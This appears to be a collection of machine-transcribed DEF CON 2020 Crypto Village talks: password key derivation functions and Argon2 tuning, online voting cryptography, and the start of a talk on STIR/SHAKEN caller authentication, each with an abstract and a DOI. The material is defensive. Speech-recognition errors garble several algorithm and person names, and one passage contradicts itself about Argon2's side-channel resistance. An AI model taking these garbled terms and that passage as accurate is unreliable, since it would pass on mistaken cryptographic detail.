for. The work factor is in terms of iteration count. Let's talk a little bit about the internal working of this algorithm. What it does is it runs the crypto primitive, it iterates over is a pseudo random function, usually a HMAC, based on the desired output length and the block size of the internal hash being used in the HMAC, different blocks are generated and those blocks are iterated for the iteration number of count times, output is concatenated and that's your password hash. You will see things a little bit in green color here. What I have done is I have written a tool which will do parameter tuning for me based on the rules of thumb I mentioned earlier about having a password being calculated in roughly one second for interactive logins and roughly five seconds for any kind of non-interactive logins. Since PBKDF is a government approved, they say the iteration count of the work factor for this algorithm should be around 10,000 which is way lower and please don't do that, please increase something. For a reasonable hardware on which most of the typical web applications would be deployed in today's time, EC2T2 instance with roughly 8 GB of RAM and x86 architecture. I ran this tool and number of iterations were around 1.5 million for just one second of password calculation. Just imagine how off the government standards are here. So I'll highly motivate whichever algorithm you decide to use among all the algorithms you're going to talk about. Please run some kind of a tuning utility player on which your parameters. I'll be open sourcing this tool. You can feel free to grab it and run it on your deployment hardware to tune your work factor accordingly. Some things you should be worried about when choosing this algorithm is please choose your password output length little less than or equal to the internal hash you're using. The reason being it unnecessary takes a lot of processing power for a no value add. So that's one of my suggestion. In this algorithm you can just configure the CPU time involved. There is no memory involved. It is still not at all resilient towards any kinds of brute forcing attempts because of the highly parallelized nature of very, very cheaply rentable GPUs in today's time. If you don't have to comply back with the government standards, please move on. Use some better memory hard functions. Next notable mention, Becrypt is still one of the one of it's very commonly used. It is based on already deprecated symmetric algorithm, symmetric cipher called Blowfish. It involves a little bit of memory for its internal working. So that's what is slightly better than PBKDF. But again, that memory or amount of memory it will need or use is not tunable by the user. And again, it was designed for generating key materials and not with storing secrets or password hashing in mind. So how does this algorithm work internally? Again we have a password fixed size salt, password output as a password hash. Iteration count is specified in logarithmic way. So this is going to be 2 raised to 14 number of iterations. And internally how it works is it has this very expensive blow cipher based blow cipher key setup process which involves some memory. So it rates around that key setup and the output is again iterated through a normal blow cipher, blowfish algorithm and the output is given to the caller. It still is a little better than PBKDF because of the internal RAM usage. But it is still very susceptible to brute forcing attacks, maybe a slightly more expensive than the previous one. And I don't understand why to use Becrypt though I've seen a lot of usages of that. If you don't have to even comply by the government standards, why not use the more modern memory hard functions? Okay, let's start talking about a few different memory hard functions. The first one being a script. It's one of the very early generation memory hard memory hardness built inside the function. It is having an increased adaptation in cryptocurrencies mainly due to the nature of it and cryptocurrencies they don't really need to worry about time memory trade off attacks like offline cracking needs to and cryptocurrencies needs to be more worried about side channel attacks which is not a domain for offline cracking. So it's mainly due to the nature of the applications it's widely adopted in cryptocurrencies. It's not like it's better or less secure for other applications. It was still designed for key material but it's a lot of promising breakthroughs in being used for offline cracking. Okay, let's see how this works. It still has password, salt output password we are given. We can still configure the length we desire out of the output. And if you see the work factor has increased from one to almost three at this point. And not all are going to be still giving us all the freedom to tune all kinds of resources but that's a huge step in the right direction in my opinion with memory hardness involved. There is parallelization you can parallelize the computation. I would like to note here that not all implementations give this control to the user. They still do it the way it depends on the implementation. You would note that there is only one parameter which will control both the CPU resources as well as the memory involved. Basically it does not differentiate between both the resources we can throw at this algorithm. So basically going down the line if we decide that memory is getting cheaper so we should increase the amount of memory being used in the algorithm we don't really have a choice here. And finally is the block size which is used internally. Most typical values are 8 or 16 does not make a huge difference. So that's okay. Let's talk a little bit about how the algorithm works internally. As we were talking about in a while talking about PBKDF it is used internally from Mac to generate a fixed size password which is looped through this crazy memory array with a lot of stream ciphers and XORing going on for the iteration number of count. And again the output is made a fixed size by PBKDFing it again and output is passed to the caller. If you are choosing this, well this reduces the time any kind of brute forcing attempts by a huge margin compared to adaptive functions. But the way the memory is being used by the algorithm internally it is still using adjusted memory arrays in the consecutive operations. What I am trying to say is depending on the value of the password the consecutive arrays are chosen. So this is always going to be a predefined sequence of memory arrays based on the input password. And what this opens us is towards the side channel attacks. Even as we spoke about earlier there is no way we can tune the CPU and memories independently. And since there is a lot of crypto involved in this algorithm like we saw we have HMAC, we have PBKDF, we have Salsa, stream ciphers, we have XORing, we next again have PBKDF. Number of crypto involved increases the implementations become more complicated, more error prone, the crypto analysis becomes more complicated and it is not as sleek basically. So these are the things you should think about if you decide to go with a script. Still a huge step ahead of the adaptive functions it still reduces the offline cracking cost by a huge margin almost like a quadraple based on the number of iterations. It is a great choice. Well don't they say save the best algorithm for the last and that's what Argon2 is. Around 2015 there was this competition which took place and the goal of that competition was to come out with an algorithm which is specifically suited for storing secrets and safeguard it against any kind of offline cracking obviously. It wasn't like before that no one was thinking about how to safely store information. Well the breaches were happening. It was more like a cat and mouse race and the industry started looking at what current tools are there in the cryptography arsenal which we can apply to this particular problem quickly so that they can safeguard their information as long as they can from any kind of online cracking mechanism. Well Argon2 the winner of this algorithm is obviously going to take care of all those existing attacks we have been talking about so far. It's very resilient against any brute forcing or dictionary attack. It's very hard to just parallelize it and run computations and start cracking passwords in minutes. They were also very resilient about modern computer architecture which started maturing become much cheaper and they were very cognizant about it will keep getting cheaper with time. So it's obviously going to be very resilient against any application specific integrated circuit architectures or even FPGA arrays. Well few years ago there were limited implementations of this algorithm out of a direct cryptography library but that situation has greatly changed. So congratulations you don't have to implement this algorithm yourself. You can pick up any programming language, any library in that language and for the most of the most amount of time you would be having this implementation ready to be plugged and played in your application. So let's see how this algorithm works. Well you still have your passwords and soils you still have will get a fixed length hashed password. In terms of memory factors you have three parameters now. One is obviously parallelization you can configure it based on number of CPU cores you have at your disposal and you can tune the amount of CPU needed in terms of number of iterations and the memory which can be used in this algorithm in terms of memory size. So it basically decouples both the resources, resource utilizations very unlike a script and one of the huge advantages. There is some crypto analysis done on Argon2 algorithms which makes any iterations below 10 a little susceptible but it is more theoretical crypto analysis so don't freak out but choose a parameter which is at least greater than 10 and that's the reason. Talking about modes of operation which is crucial. There are two main types of modes in this algorithm. One is data dependent mode which is what was there in the previous script algorithm as well and a data independent mode which is the best option for password storage and the third one is a hybrid of both the modes working together. How this modes work for that let's start talking about the internal crypto of this algorithm. So how it goes is it first computes a hash of password salt and all these different parameters. Any hash can be used usually it is a Blake 2 and based on the value of the hash sorry before that there is this memory array which is dedicated to this based on the memory size we give. So just imagine it as rows and columns being populated iteratively for number of iterations of times. Now after so for data dependent mode and data independent mode how it is different. It's like each memory array is being populated in sequence but that sequence in data dependent mode is decided by the value of the hash which is dependent on the value of the input password and for data independent mode it is completely random. So basically what it comes down to is the sequence of memory array population per iteration is actually based on the input password and this particular feature of this algorithm makes it susceptible to side channel attacks which is okay for cryptocurrencies but not very comfortable for any kind of password storage and that's why you should use the independent mode where the sequence of memory array population is completely random and it takes away even that issue which a script had and which even the this kind of attacks might have. So some design considerations you have to tune your parameters a little more carefully and mostly because you have few more parameters to take care of. As we talked about the data independent mode is more susceptible to any kind of side channel attacks and there is this hybrid mode where the first part of it is happening in independent manner and the next house is happening in the data dependent manner and with that we get the best of both worlds. We are silent towards side channel attacks as well as we are much better with the time memory trade off issues. So that's what I would say use Argon to mainly in 2ID mode we already looked at what is the best parameter options for an output for a password computation within a second. Since Argon 2 is the algorithm I am highly recommending to be used for any kind of sensitive information storage. I like to quickly show how easy it is to just start using this by any implementations you have access to. I just to record this demo I had a 4cluff EC2 instance these are the details of the instance it's a typical standard T2 medium with two CPUs and four GB of RAM currently available as of this moment is around 2.8 gigs it's using a x86 architecture on a Linux kernel. So let's see how quickly this to start using this well I am going to use NSEL's password modules where the Argon 2 ID is being supported well a quick pro tip whenever given a choice of any crypto implementation you need if you have a choice always go for NSEL it's very cleanly written by cryptographers rather than actual developers they are deprecate things which are no more secure or better options are available out there they quickly deprecate all those things from anyone's view so chances of making wrong choices are eliminated. Coming back to the code we are going to use that module and just to keep track of time we are going to use the time module start time is going to be current time let's start storing the password first let's use the module hash.argon2id why not use the hybrid one best of both worlds right and the string output for that giving the password along is better than higher entropy shorter one so that's what I choose for. Arch limit is the number of iterations around the memory array let's go for 14 and it's around 10 is already theoretically crypto analyzed so anything about 10 is great and the key thing memory it's again logarithmically given we already know the answer from our tuning tool so let's see this is this is as short and sweet as it can get actually and just to keep track of time let's see how much it is and hopefully this compiles and runs actually okay so it took around 1.1 second can we go any higher let's see going from 27 to 28 which is 2.3 I leave that choice to you at this point this is how you should typically tune any parameters it's almost a second nature to wonder how these functions actually compare against each other there is not a lot of research done in this topic about how to actually put a dollar value or number of years of cracking a particular breach mechanism or there is no apples to orange comparison as well you could imagine but good notable work is being done by these two papers one released in use mix a couple of years ago and another one done in conjunction at between Microsoft and Purdue University in the most trivial way what they do is they look at the latest hardware and the memory cost and just do a reverse or just start calculations from there and that's what I tried to do it as of yesterday so for adaptive function it's just going to be again sorry again a huge list of disclaimers here before I actually talk about this very very cautiously actually is the I'm assuming the keyword the password the salt the output all those things are same across all these functions I'm also assuming there is no electricity costs involved yeah and so talking about these figures for adaptive function it's just going to be as simple as number of iterations per cost of hardware and the cost of hardware would be is much easier to calculate these days because most of the modern a6 hardware for Bitcoin mining come with that statistics so looking at one of the most leading hardware in that department coming from Ant minor there one of the best configured one is around $2500 and it promises to do 110 trillion hashes per second and trillion is 10 raised to 12 if you are wondering as I was so using that that configuration with the number of iterations adaptive function is going to take so much time the point being it's going to be extremely cheap to just crack these passwords considering this decently priced machines are going to be in common people's hand very soon and similarly for memory hard functions and I want to stress here that this is only for memory hard functions which is running in the data dependent mode where the array used for memory memory calculations is based on the input passwords so where again the cost is going to be more based on memory as well as the amount of time it takes which pretty much quadruples in memory hardness is going to be much more expensive compared to adaptive functions and this is just for data dependent mode for data independent more well the cost might still be the same but the number of guesses is going to be exponential so this is just sharing some statistics still in a more conservative tone this is all of what I wanted to speak about today around offline cracking different mechanisms we can use to safeguard ourselves key derivation function being the key of that how to tune different parameters and what kind of design concentrations you should be doing while picking each one of that next I like to talk about the little bit about how all this information can be mapped to storing any kind of secrets you need to for that you need to sit down and do a little bit of threat modeling for your own usage is something like what what is sensitive to your business do you need to comply by any GDPR requirements or are you storing any personally identify the information can it be used for crafting further attacks against the users whose and whose information is might be breached how are you storing that information are you storing it in database which fields are involved in that database all those things needs to be thought about and you can easily map all this KDS to work for your own needs lastly you must have come across countless countless suggestions and password hygiene requirements or tips over years since it is such a key aspect of any kind of authentication mechanism I led just for the complete completeness of the stock I like to say a few things about it always choose a unique password password managers are great please use those longer passwords are better than shorter higher entropy ones this is what I typically do is I store my passwords in a password manager this is a configuration I use while generating any new password I choose a longer password and with a reasonable amount of entropy the point I am trying to make is there is a lot of crypto analysis done where which points us towards the points us towards the theory that longer passwords are better than shorter ones with higher entropy so a password whose length is like say 25 or 30 characters is far better than a password which is of 8 or 10 characters standard length with like two special characters one uppercase and two digits and those kind of things so do that and the website we looked at about the data breached information they have a nice API exposed by again Troy Hunt it would be great to use that API in your websites or even password managers can start using that where if a used a password which is already been seen in a breach is being used then they would be flagged and and that would go along with finally in conclusion please embrace adaptive key derivation functions use memory hard functions based on your choice and the comfort level with the amount of crypto analysis done please don't do a plain text or hashing or your own DIY designs those are all silly things in today's time consider upgrading your work factors based on the resources cost out in the market consider having a unique work factors for information you are trying to save or for each different user as well password hashing suggestion longer is better than a shorter with a higher entropy a key puting passwords keep auditing your passwords for its existence in any breaches and finally I'd like to conclude a huge thanks for giving me this opportunity to share my thoughts my DMs are always open for any interesting conversations I blog a lot about these things in much more detail than what a 45 minute slot is going to ever allow me to and finally you will find all this algorithms implemented in Java as well as the tuning tool on my GitHub repo. Thank you. Let's talk how to store sensitive information in 2020 and do zones and how to crypto building blocks using Java. Thank you again to Moncy. We have them right here for a live Q&A so please put your questions in the discord. So this just started off. What's the reason for high memory switch is a requirement for KDFs. This is from discord by the way. I understand it helps make implementing ASICs harder but I don't understand why. Sure. So ASICs in my opinion really started coming into existence because of the underlying bitmining philosophy is like increasing the computation over and over again much much faster. The hardware is still very is still expensive and throwing memory at it will just make it much more expensive for a widespread adoption actually and that would ultimately add to the cost of cracking passwords offline in my opinion. Again we have not seen the future. We don't know what quantum is going to get us but for foreseeable future for whatever the current theoretical crypto analysis says that's what it is. Awesome. We have another question. The memory is the bottleneck. Is there still an advantage to using ASICs or does it revert to only negligible gain over general purpose CPUs? Well we still have a huge iteration factor right so it's a combination of both. So a general purpose CPU can't be that highly parallelized with the amount of memory required for each thread. So yeah. Another question that we have is does a salt need to be just unique instead of being that big to avoid having two passwords hashed the same thing. This is in relation to 64 bits versus say 128 bits. Sure. Well 64 bits is like the pure minimum requirement anyways from a standard which was at least half it is I mean at least five or six years ago. I don't remember right now. Actually even more this is PBKDF probably. So I mean a little bit more salt 128 is not unacceptable. It's not going to add hugely to the processing power. Yeah. It's not a hard requirement. Even a CSPRNG is like maybe a little too much crypto kind of a situation. So yeah. It's it's a little bit on a higher side but that's okay in my opinion. It does not add to the computation at all. Awesome. Another question we have. And there were some side parts of this of course in chat if you want to go further into them as I saw. But the question was any thoughts on using Libsodium to fork instead of NACL. I have had great experiences with it. Yeah. Libsodium is great. It is being adopted much more widely as I stood corrected. NACL is last made then like at least five, six years ago. I have slight preference for NACL just because I like the documentation and the names of the APIs and the way the ease with which they are taking away all the back all the like more options you give the higher the chances of it actually going wrong. So that way I feel NACL is slightly better but Libsodium is absolutely great anyways. So that's my personal preference. But yeah. Awesome. Does anyone have any other Q&A questions? Please drop them into the discord now. This is in the CPV talk Q&A text channel. And we just wait for a little bit. Also thank you so much for your talks. These are really lovely and I'm really excited for the next one to be replayed again soon. Thank you. I'm having a lot of fun watching me talk for two hours. Oh man that's a lot of anxiety for me at least. Oh that's fun. I think we have someone typing. Oh nope just people love your talk. Thank you. Let's see. Let's see if this last person has a question. Alright thank you again Moncy for all your time with us. We hope you take care. Enjoy the rest of Crypto Village and DEF CON. We will love to see you in our discord soon. Yep please stay safe everyone. Please stay safe. Thank you. Bye. Take care.
|
It goes without saying never ever store personal/sensitive information in clear text. It is also a well-known fact salting, hashing or stretching your information can just provide little offline information cracking protection against contemporary computer architectures and modern brute force attack constructs. Those abreast with this subject would have come across countless advocatory material suggesting to use key derivation functions (KDFs) to store sensitive information. There are handful of solid KDFs, which are good candidates to use for storing sensitive information such as pbkdf2, bcrypt, scrypt, Argon2. In this talk, lets dive deeper to study some of its underlying crypto, what and how to tune these algorithms with secure input parameter configurations and how to decide which algorithm would be the right choice for your needs? Lastly, I will present some statistics on how well do all these different algorithms compare against each other.
|
10.5446/51627 (DOI)
|
Hi everyone, welcome to online voting theory and practice of Porter Adams and Emily Stam. We're at the DEFCON Crypto Village in August 2020. My name is Porter Adams. I'm a software engineer at Blacktop Government Solutions and founder of Disappeared Digital. You can contact me at Twitter at PrivacyPorter. I'm Emily. I'm a security research engineer at Allstate. I'm also the COO and co-founder of Cybersecurity Nonprofit or CSMP. You can find me on Instagram at crypto.emily. So I talk outline. We've got three major pieces. We're doing a quick intro now. I will be talking about the practice of online voting and Emily will talk about the theory of online voting going into homomorphic encryption, mixed nets, and blind signatures. So we're talking about online voting. So not all election security, not even all voting, just online voting. So what do I mean by that? So one form of online voting is anything is called electronic voting or e-voting. And that just refers to something that includes at least some electronics. So the United States, a lot of our voting systems already use e-voting by having computer screens that you can touch. But e-voting does not necessarily mean all online. Internet voting is what people would think of as like 100% online. Internet voting is when it's all gone fully digital and there's no need for in person, anything in person. So safety of voting machines, I'm just going to refer you to the DEFCON voting village. They do a lot of really great work over there. It's not the focus of our talk. We're going to be talking more about the internet voting side of things and how it would be possible to vote entirely online. So this is the biggest question I get is why can't we all vote from our phones? And it's a really great question. And so we're going to spend some time explaining actual reasons why we can't yet. The advantage and why people want to vote from our phones in the first place. The first one is just the convenience factor. It's so much easier if I can sit at home and vote for my phone. It's also especially easier for overseas voters who if they currently have to vote by mail that can take a long time for their mail to get in and their votes may not even be counted by the time. So it's a lot easier for expats to vote from their phones. It also would hopefully improve voter turnout because it's a lot less effort to download an app on my phone and click some buttons than it is to show up at the polling station. Less human error. So we all remember the 2000 election with the hanging chads in Florida and not being able to determine which way the votes went. When we vote on a computer it's either a zero or one. It's pretty clear and doesn't leave room for human error when filling out the ballot. So let's talk a bit about usability. So even if we had a totally working mobile app that everyone like could download and use and was all safe and private which our concerns I'll get to later in the talk. In Finland in 2008 they had some issues with the user interface and what happened was people when they were going to vote they would see the screen they would tap through click all the candidates they wanted to vote for. But at the bottom of the screen was a submit button and about 2 percent of voters did not see the submit button on the screen and therefore their votes were not counted in the Finland election 2008. It is a user interface problem that would be a big issue if people tried to vote but mistakenly like didn't hit submit button that would be a concern even if everything else was safe and secure and working. The other case I want to bring up as Iowa in 2020 at the Democratic caucus had many problems with their mobile app that they tried to use to help tally up the votes. We can learn a lot of lessons from that but one I want to highlight is that some people had trouble even downloading the app correctly. And so even again if we had like all the security and privacy stuff worked out there's still some usability concerns with can people download the app can people use the app. All of this kind of comes down to like comfort with electronics which a lot of us have here at like DEF CON but not everyone else in the world is as comfortable as we are with using these things. So here are some of the big concerns and security is by far the biggest one. We need to make sure that our elections actually safe. Privacy is making sure like is it possible to even do a secret ballot online because we all know there's so much tracking and surveillance with what we do online that having actually private vote would be pretty tough. So I'm going to try and answer both these questions in the remainder of my talk. So first security is it safe. There is a huge attack service for anything that's going to be online some sort of mobile app. And so let's just kind of go quickly over like all the different ways that would need to be like that could be a voting app could be attacked by. And we would need if we wanted to do this in practice to show up all of these things and make sure that none of these could happen. So if I was a hacker trying to attack a voting app I could install a back door either as you vote on the client side or when the votes are tallied on the server side. I could create an exploit for the voting app itself or for the phone operating system or for the server code server operating system. I could spy on votes by intercepting the connection maybe with a fake wireless access point or a key logger on person's device. There's always social engineering you'd have to worry about with phishing app insider threat whoever like created the code for any of these pieces you have to watch out for. And I was running the election and then just destructive attacks like a distributed denial of service where the app just goes down on the day we're all supposed to be voting. So usually when I'm trying to explain all of this to someone they always come up with but banks have mobile apps and this is a really smart point and so it's worth addressing why even though banks have mobile apps it's still very tough for a voting system to be on a mobile app. So what's the difference between a voting app and a banking app? First one's identity when you're banking basically anyone with your credit card info can go online order some stuff on Amazon but when you're voting we need to make sure that it is really only you. In terms of security banking has the benefit of being able to detect fraud kind of later and afterwards whereas with an election if there's any sort of fraud going on we need to know about it immediately. And privacy is one of the biggest differences where when it's just you and your bank talking and like your bank knows everything and you know all of your own stuff that's fairly easy to figure out just between the two of you. But for voting we all have secret ballots which I'll get to in a little bit it makes it very challenging for my vote to stay secret while everybody else still trusting that votes were placed correctly. And then lastly trust in banking like it's really just between you and the bank and other accounts like don't really affect you or like other people using your bank versus in a voting system in a voting app I need to trust all of the votes from everybody not just my own and so trust is very different for a voting app. So the privacy challenges specifically of online voting first you got the secret ballot and so what does that mean more or less that I need to be anonymous when I vote. So no one should be able to figure out based on like like no one should be able to figure out who I voted for and there shouldn't even be a way for me to prove it to anyone next to each other next to me or around me so no one can force me to vote a certain way. It's very important for our elections. Voter registration is not exactly a privacy challenge it's like an identity thing but it's going to be kind of related so I include it here. Voter registration it needs I need to be very sure that like whoever is submitting the information in this voting app is the person on the registration list and this counts against like double voting which on the internet is much more it would be much easier to happen where you could submit something twice and have it accidentally be double counted and trust is the big third privacy challenge where all votes must be trusted and typically to ensure that trust that means lots of visibility and so the big challenge here overall is combining the secret ballots with trust and you have to somehow like include all the anonymity expected for voters while still having all the visibility needed for the overall election and everyone to trust the results and putting these two together digitally is actually extremely tough and will require some really cool math that Emily will talk about in the second half of this talk. So it's cryptography for online voting is the answer it's going to solve all of our privacy concerns and I just want to say big thanks to cryptographer David Chom for inventing a lot of this stuff I know if you're at the crypto privacy village at DEF CON and have not heard of David Chom before please look up some of this work he's done awesome stuff. Okay, so how does Estonia vote online especially in the United States anytime this gets brought up it's like how is some other country doing it but we can't. First steps identity in Estonia they all have a national ID card that includes a chip on it where they can create digital signatures from essentially means their like government issued IDs can act as a form of identity on the internet so they can log in using these chips although I believe in the last two years they have switched from hardware chips to an authenticator app but this still stands that they have some sort of way of converting from your real life presence to your online presence. Secondly cryptography Estonia uses a combination of mixed nets and homomorphic encryption specifically using Algamol and Emily will explain what those are in the later half of this talk and in terms of trust Estonia has been voting online since I think 2005 and every year they keep making gradual improvements anytime security people go check out there's always something that's broken which isn't really surprised but Estonia has done a good job of fixing the things that are broken and over time the system's gotten a lot better and hopefully is mostly safe from real threats they haven't had any giant accusations of election interference so either that means they haven't caught anyone interfering in their elections or they've actually been doing a good job. In 2019 almost a quarter million Estonians voted online which is very impressive numbers and goes to show that this is like possible in the future if it is done slowly and correctly. Now one big thing to watch out for is cryptographic backdoors these are are tough to catch so Switzerland has been doing online voting and some researchers looked into their mixed net shuffle proof and found a naive implementation of the zero knowledge proofs inside of there which would have allowed for all of the votes to be changed by an attacker and so making sure that like every last inch of the app needs to be like very carefully done and especially when it comes to cryptography you need the person who's coding it to be aware of all of the cryptographic assumptions and make sure that they are coding in everything properly. So let's look at voting cryptography around the world. Three big ones I want to point out are in Estonia, Switzerland and then Moscow has some local elections that are online and Estonia uses a combination of homomorphic encryption and mixed nets same thing for Switzerland and Moscow is using homomorphic encryption and blind signatures. So not too many like countries or places around the world have an online option right now there are a lot more countries that have tried doing this and quit Belgium Finland France Germany Ireland Kazakhstan Netherlands Norway are on the list and the reasons for for quitting are mostly either every security person says it's not very safe or the voter trust in an online system is just not very high and one of the most important things for an election is that voters do trust the system and so even if online voting is safe if the voters all think that it's not safe then it's not a good idea to offer an internet voting option. All right so now I'll talk about the cryptography behind the scheme. All right so now I'll talk about the cryptography behind the scenes that makes online voting possible. So some of the considerations we have the first is security so preventing attacks preventing adversaries from tampering with the election and being able to detect faulty voters and centers. The second is robustness so no small set of servers should be able to disrupt the election. Accuracy the results should reflect the way people actually voted. Verifiability we should be able to verify that the votes are accurate in particular individuals should be able to verify that their vote was counted correctly. Confidentiality keeping vote secret is crucial. Usability for all ages and speed and efficiency including casting the votes processing them and counting them. So there are three types of cryptographic protocols I'll cover in this talk homomorphic encryption mixed networks and blind signatures. So first homomorphic encryption. So homomorphic encryption is computation on encrypted data so this form of encryption actually allows us to do computations on the data when it's in its encrypted state. There's been a lot of research into this area and it's very promising because generally our cryptography when we have our data and it's encrypted we can't use that data in any way. The only way we can actually make use of it is to decrypt it back into its original form. But with homomorphic encryption we can actually perform computations on the encrypted data. So this means we could outsource data to cloud environments for processing all while encrypted. We could perform data analysis again while data remains in its encrypted form and in particular with election voting we could obtain a tally of the encrypted votes without actually having to decrypt the individual votes maintaining privacy the entire time. So to give a little bit more of the mathematics of the scheme. So homomorphic the term actually comes from a math term called homomorphism which is a math that preserves some structure. So that's what you can kind of think of homomorphic encryption as doing. It preserves some underlying structure enough to perform functions on it. So you have a message you encrypt that message you perform a function on it and then you decrypt it and that would be the same thing as if you apply the function directly to the message. And there's different types of homomorphic encryption. Generally they are categorized based on what kinds of computations you can perform whether it's just partial whether it's addition multiplication. But we even have fully homomorphic encryption and that actually can perform arbitrary gates and depths meaning really arbitrary computations. The only practical and secure fully homomorphic encryption implementations currently are based off of lattices. So lattice cryptography it's this new relatively new form of cryptography that is beginning a lot of attention recently partially because it's quantum secure cryptography meaning that it's secure against quantum computers. And it's actually most of the finalists in the post quantum cryptography NIST competition are lattice based. And lattice cryptography has some very strong security assumptions especially compared to our classical cryptography like RSA. It's also very flexible and efficient. Generally the main downside is that it has large key sizes but depending on the scheme they're not even always that much larger than RSA. So lattice cryptography is very important for the fully homomorphic encryption but we'll also touch on it when we come back to blind signatures. So I just wanted to mention what that is. And so now we'll turn back to homomorphic encryption in voting in particular. So how does it help? So we can tally the votes in the encrypted state which means we take all the votes in in their encrypted state add them together and then decrypt the result. And because of the homomorphic encryption we get the same result as if we decrypted them separately and added them together. So this allows voters to maintain their privacy. There's also a protocol that allows voters to verify their votes. And even if we don't use homomorphic encryption in the election we can still use it for ballot comparison. So ballot comparison is very important in the election process to inspire voter confidence by comparing ballots and the electronic records. And the way we could use homomorphic encryption is this in this is that we can actually do this comparison on the votes in their encrypted state. So we would inspire voter confidence without actually giving any information about the votes. And how this is done now is the votes are anonymous but even still with anonymous with not tying them back to the individuals you can still find patterns. So it would be more secure if they were in their encrypted state. So next I'll talk about mixed networks. So mixed networks also called mixed nets are routing protocols that use a chain of proxy servers and senders mixes to take in messages from senders and send them to receivers in some random order. Additionally they use encryption at each state and it makes it harder to trace. And you can also think of it as being kind of like a Russian doll some nested encryption going through. So there's two types. There's the decryption mix net. So that's where you do all the encryption in the beginning and then you partially decrypt and mix at each stage. There's also re-encryption where you re-encrypt and mix at each stage and do do the full decryption at the last round. And there's also shuffle and decrypt proofs for verification as well. So lastly we'll talk about blind signatures. So just to recall a digital signature provides authenticity. So verifying that you're talking to the person you think you are verifying a known sender and integrity verifying that the message you're receiving has not been altered in transit maliciously or accidentally. So how it works is one party signs the message and creates a signature with a private key and then the other party will verify that with a public key. So with blind signatures it's a digital signature where the message is masked or blinded and then sent and then signed. So blind signatures can then be verified against the original message the same way digital signatures are. The key difference is that with blind signatures the person signing them doesn't know the contents of the message. So voting is actually a common analogy with blind signatures. So imagine you have a voter and they complete an anonymous ballot which they then place in an envelope with their credentials. They hand that envelope to an official who signs it and the signature of the official imprints through the envelope onto the ballot and they return that envelope to the voter. The voter then places the ballot in a different unmarked envelope before submitting it. So now the message was correctly insufficiently signed by an official without the official having to know the contents of the message. So it provided the authenticity and integrity but maintained the confidentiality. So to talk a little bit more about the scheme in a less analogous way what actually happens. So a user has some message D and they blind the message to get a new message D star and that's what they send to the signer. The signer then uses the private key to generate a signature sigma star for that message D star and returns it to the user. The user can then create from sigma star a valid signature sigma corresponding to their original message. So any recipient can now validate this signature sigma as they would any other signature and the signer gets no information about the contents of the message or the actual signature. And there's different mathematics behind blind signatures. There are RSA based options. I don't I wouldn't recommend using these because with where we are right now if we're implementing new technology we want to be looking as far ahead as possible. And in the long run RSA is not secure against quantum computers and just is not secure compared to these other types of schemes. But there's also some attacks on the RSA based blind signatures. So I'm mostly going to focus on the lattice and the multivariate base. So the lattice based blind signatures again they're post-quantum secure and they rely on similar problems, similar types of schemes as those that are finalists in the NIST post-quantum cryptography competition. So we have a lot of faith in these lattice based schemes and we can create blind signatures from them. Additionally multivariate there's a scheme called the rainbow scheme that's a finalist in the NIST post-quantum cryptography signature schemes competition. So again it leads to be post-quantum secure and we can turn this scheme into a blind signature scheme. And there's a lot of benefits to multivariate cryptography such as having very fast and short signatures. And this diagram just kind of shows how the rainbow scheme works. Essentially you have a message w, the hashed message, and you recursively obtain inverses of these functions to get the signature z. And then that signature z can be verified by using the public key function and just applying that to see if you get the correct message back. With blind signatures there's just an extra, some extra steps in this process. You use a special function called r that actually by using that you create the blind aspect of it and then you use zero knowledge proofs at the end as well as part of the verification proof. So a little bit more complicated but again very similar mathematics. So in summary we talked about homomorphic encryption, so computation on encrypted votes which allows us to tally the votes in their encrypted form. And it can use different types of cryptography but lattice space is one that is post quantum secure and very flexible. Then we talked about the mixed networks protocol where you have a nested series of encryption or re-encryptions and shufflings and this way you cannot determine which person the vote came from. And there's also a range of underlying public key cryptography mathematics that I didn't go over but the protocol itself is fairly flexible. And finally we talked about blind signatures. So this is where you create a valid signature without knowing the contents of the message. So you're verifying authenticity and integrity of a vote while maintaining confidentiality of a voter. And we talked about lattice and multivariate based schemes. To summarize everything is it possible theoretically? Yes eventually cryptographers will help us get it right as well as security people. Is it ready in practice? Not yet in the United States. Let's start small scale and maybe eventually we'll be able to have more voters vote from their phones. So thank you. Thank you for coming to the talk.
|
The concept of voting online is daunting to many because of the security risks, feasibility, and reliability. However, given the presence of election interference, limitations of in-person voting, and adoption of new technology, many countries are converting to electronic voting. In this talk, we discuss the theoretical and practical benefits and limitations of electronic voting. Emily Stamm will discuss the mathematics behind homomorphic encryption and blind signature schemes, with an emphasis on schemes that are secure against quantum computers. Porter Adams will discuss how these schemes and others are used in practice, and analyze the advantages and disadvantages of electronic voting.
|
10.5446/51629 (DOI)
|
Hey everyone, if you're anything like me, your miss calls list looks a lot like this. And I know I'm not unique, you know, the average person gets about 14 unwanted calls every month. And you might notice that some of these in my call list are flagged as spam, which is somewhat useful. But what if we could actually start to verify callers? What if we weren't just flagging things as spam and potentially harmful, but actually doing the opposite and saying, hey, you can trust this call? We already do this with websites. We already do this with emails. Why can't we do this with phone numbers? The good news is the short answer is that we can. And I'm going to be telling you about this TLS-like technology that's been developed to solve the call authentication problem. It's called shaken and stir and we'll be diving into the history of why this is a problem, some definitions and technical details of the spec. How the US is going to enforce implementation. Unfortunately, a lot of this is specific to North America right now. But we'll also be diving into the limitations of what this technology is, one of those obviously being that it's not applicable to the rest of the globe yet. My name is Kelly Robinson. I have been working at Twilio for about three years. Twilio offers a lot of communication services, including a lot of stuff around telephony. I actually work on Twilio's account security products for things like phone verification, but this was just something that I got really interested in terms of what the telephony security of actually authenticating call systems was. So we have a separate team that I'm not involved with at Twilio that is working on implementing some of this stuff, but this is just some of my own research into what this is, how it works and hopefully I can share that with you. And somewhat of an introduction to what Shaginstar is. So let's start with just talking about what telephony security even means. Security isn't quotes there very obviously because basically there wasn't a lot of security when telephony got started. There was a monopoly of companies and even as recent as 30 years ago, the network basically looked like this. It was private, it was closed, there was proprietary technology everywhere, there were just a couple of companies and they all basically knew how to trust each other, they all knew who they were dealing with and they all had direct lines of communication with one another. And if you compare that to today, there's literally thousands of companies, it's really easy to access this technology. There's more standard technology now built on top of IP so you don't have to have this kind of proprietary technology and a lot of infrastructure to get started. And there's all these potential paths and routes for a call to take. And you can think of the difference in accessing the telephony network like you would in deploying a website today. So this is kind of the difference between having your own on-prem hardware, your own servers that you're running versus today you can use something like AWS to get up and running very quickly. And before we dive into this a little bit further, I do want to give a little bit more context on some telephony jargon. If you aren't familiar with telephony, like I wasn't before I started working at a telephony company and starting with a PSTN. So this is the analog and digital systems like cellular networks, undersea fiber optic cables and copper telephone lines. This is what allows people across the globe to complete voice calls. Something that you might have heard of before is VoIP. This is the 